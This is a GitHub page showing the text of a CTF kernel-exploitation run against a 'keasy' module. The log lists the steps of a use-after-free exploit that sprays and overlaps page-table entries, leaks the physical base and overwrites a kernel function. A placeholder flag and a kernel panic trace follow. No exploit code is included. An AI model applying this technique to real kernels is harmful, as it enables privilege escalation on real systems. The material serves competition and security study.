-
Notifications
You must be signed in to change notification settings - Fork 71
Expand file tree
/
Copy pathwriteup02.txt
More file actions
109 lines (107 loc) · 6.8 KB
/
Copy pathwriteup02.txt
File metadata and controls
109 lines (107 loc) · 6.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
__ _ ___ ____ _____ __ __
| |/ ] / _] / |/ ___/| | |
| ' / / [_ | o ( \_ | | |
| \ | _]| |\__ || ~ |
| \| [_ | _ |/ \ ||___, |
| . || || | |\ || |
|__|\_||_____||__|__| \___||____/
___ ____ _____ __ __ __ _ ___ ____ ____ ___ _ __ __ __ ____ _ _
/ _] / |/ ___/| | | | |/ ] / _]| \ | \ / _]| | / ]| | | / || | | |
/ [_ | o ( \_ | | | | ' / / [_ | D )| _ | / [_ | | / / | | || o || | | |
| _]| |\__ || ~ | | \ | _]| / | | || _]| |___ / / | _ || || |___ | |___
| [_ | _ |/ \ ||___, | | \| [_ | \ | | || [_ | | / \_ | | || _ || || |
| || | |\ || | | . || || . \| | || || | \ || | || | || || |
|_____||__|__| \___||____/ |__|\_||_____||__|\_||__|__||_____||_____| \____||__|__||__|__||_____||_____|
Good luck... 🤓
sh: can't access tty; job control turned off
~ $ /bin/writeup02
[+] Spraying mmap
[+] Spraying fd 1
[+] Trigger UAF
[+] uaf_fd : 261
[+] Spraying fd 2
[+] close sprayed fd
[+] Spraying PTE 1
[+] dma_buf_fd: 5
[+] Spraying PTE 2
[+] Increase file->f_count
[+] Searching Overlapped PTE->Entry[7]
[+] Overlapped PTE->Entry[7] : 0x15347000
[+] Overlapped PTE->Entry[7] = dma_buf
[+] Increase file->f_count
[+] Leak Physical Address Base
[+] physical_base : 0x17000000
[+] Overwrite Kernel Function
[+] Execute evil func!!
[+] win > _ <
flag{aaaaaaaaaaaaaaaaaaaaaaaa}
[ 8.860202] BUG: Bad page map in process writeup02 pte:8000000115387067 pmd:135c78067
[ 8.861804] addr:0000000015350000 vm_flags:000000fb anon_vma:0000000000000000 mapping:ffff96c7bb34f208 index:0
[ 8.862124] file:dev/zero fault:shmem_fault mmap:shmem_mmap read_folio:0x0
[ 8.873821] BUG: Bad page map in process writeup02 pte:800000001724d067 pmd:135d4b067
[ 8.874138] addr:0000000023400000 vm_flags:000000fb anon_vma:0000000000000000 mapping:ffff96c7a53b6908 index:0
[ 8.874440] file:dev/zero fault:shmem_fault mmap:shmem_mmap read_folio:0x0
[ 8.890302] BUG: Bad page state in process writeup02 pfn:115387
[ 8.894423] kernel BUG at fs/open.c:1424!
[ 8.894913] invalid opcode: 0000 [#1] PREEMPT SMP PTI
[ 8.895125] CPU: 0 PID: 123 Comm: writeup02 Tainted: G B O 6.1.63 #3
[ 8.895464] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 8.895626] RIP: 0010:filp_close+0x80/0x90
[ 8.895626] Code: 48 89 df e8 62 58 00 00 89 e8 5b 41 5e 5d c3 cc cc cc cc cc 31 ed f6 43 45 40 74 ce eb e2 48 c7 c7 33 1e b0 a3 e8 c8 cf 83 0
[ 8.895626] RSP: 0018:ffff9bfa803dfd20 EFLAGS: 00000246
[ 8.895626] RAX: 0000000000000026 RBX: ffff96c78015bc80 RCX: e5e7f1f98bfa2500
[ 8.895626] RDX: ffff9bfa803dfc08 RSI: 00000000ffffdfff RDI: ffffffffa3c78840
[ 8.895626] RBP: 0000000000000000 R08: 0000000000001fff R09: ffffffffa3c48840
[ 8.895626] R10: 0000000000005ffd R11: 0000000000000004 R12: 03ffffffffffffff
[ 8.895626] R13: ffff96c79fa35ce8 R14: ffff96c78015bc80 R15: 0000000000000006
[ 8.895626] FS: 0000000000f743c0(0000) GS:ffff96c7bbc00000(0000) knlGS:0000000000000000
[ 8.895626] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 8.895626] CR2: 00007ffe08599318 CR3: 000000001840a000 CR4: 00000000003006f0
[ 8.895626] Call Trace:
[ 8.895626] <TASK>
[ 8.895626] ? __die_body+0x5f/0xb0
[ 8.895626] ? die+0x9b/0xc0
[ 8.895626] ? do_trap+0x9c/0x170
[ 8.895626] ? filp_close+0x80/0x90
[ 8.895626] ? filp_close+0x80/0x90
[ 8.895626] ? handle_invalid_op+0x64/0x80
[ 8.895626] ? filp_close+0x80/0x90
[ 8.895626] ? exc_invalid_op+0x34/0x50
[ 8.895626] ? asm_exc_invalid_op+0x16/0x20
[ 8.895626] ? filp_close+0x80/0x90
[ 8.895626] put_files_struct+0x7a/0xd0
[ 8.895626] do_exit+0x24e/0x8e0
[ 8.895626] ? complete_signal+0x19c/0x2b0
[ 8.895626] do_group_exit+0x88/0x90
[ 8.895626] get_signal+0x5f6/0x630
[ 8.895626] arch_do_signal_or_restart+0x95/0x6a0
[ 8.895626] ? __bad_area_nosemaphore+0x176/0x230
[ 8.895626] exit_to_user_mode_loop+0x58/0xb0
[ 8.895626] exit_to_user_mode_prepare+0x4a/0x80
[ 8.895626] irqentry_exit_to_user_mode+0x5/0x20
[ 8.895626] asm_exc_page_fault+0x22/0x30
[ 8.895626] RIP: 0033:0x7ffe08599318
[ 8.895626] Code: Unable to access opcode bytes at 0x7ffe085992ee.
[ 8.895626] RSP: 002b:00007ffe085887a8 EFLAGS: 00000246
[ 8.895626] RAX: 0000000000000000 RBX: ffff96c7801a53c0 RCX: 0000000000450d07
[ 8.895626] RDX: 0000000000000100 RSI: 00007ffe08588688 RDI: 0000000000000001
[ 8.895626] RBP: ffff9bfa803dff48 R08: 00000000004ca1d0 R09: ffff96c7801a53c0
[ 8.895626] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
[ 8.895626] R13: 0000000000000000 R14: ffff96c79fa19000 R15: ffffffffa2800000
[ 8.895626] ? 0xffffffffa2800000
[ 8.895626] </TASK>
[ 8.895626] Modules linked in: keasy(O)
[ 8.902981] ---[ end trace 0000000000000000 ]---
[ 8.903163] RIP: 0010:filp_close+0x80/0x90
[ 8.903295] Code: 48 89 df e8 62 58 00 00 89 e8 5b 41 5e 5d c3 cc cc cc cc cc 31 ed f6 43 45 40 74 ce eb e2 48 c7 c7 33 1e b0 a3 e8 c8 cf 83 0
[ 8.903781] RSP: 0018:ffff9bfa803dfd20 EFLAGS: 00000246
[ 8.903886] RAX: 0000000000000026 RBX: ffff96c78015bc80 RCX: e5e7f1f98bfa2500
[ 8.903960] RDX: ffff9bfa803dfc08 RSI: 00000000ffffdfff RDI: ffffffffa3c78840
[ 8.904336] RBP: 0000000000000000 R08: 0000000000001fff R09: ffffffffa3c48840
[ 8.904545] R10: 0000000000005ffd R11: 0000000000000004 R12: 03ffffffffffffff
[ 8.904775] R13: ffff96c79fa35ce8 R14: ffff96c78015bc80 R15: 0000000000000006
[ 8.905000] FS: 0000000000f743c0(0000) GS:ffff96c7bbc00000(0000) knlGS:0000000000000000
[ 8.905236] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 8.905410] CR2: 00007ffe08599318 CR3: 000000001840a000 CR4: 00000000003006f0
[ 8.905674] Kernel panic - not syncing: Fatal exception
[ 8.906612] Kernel Offset: 0x21800000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)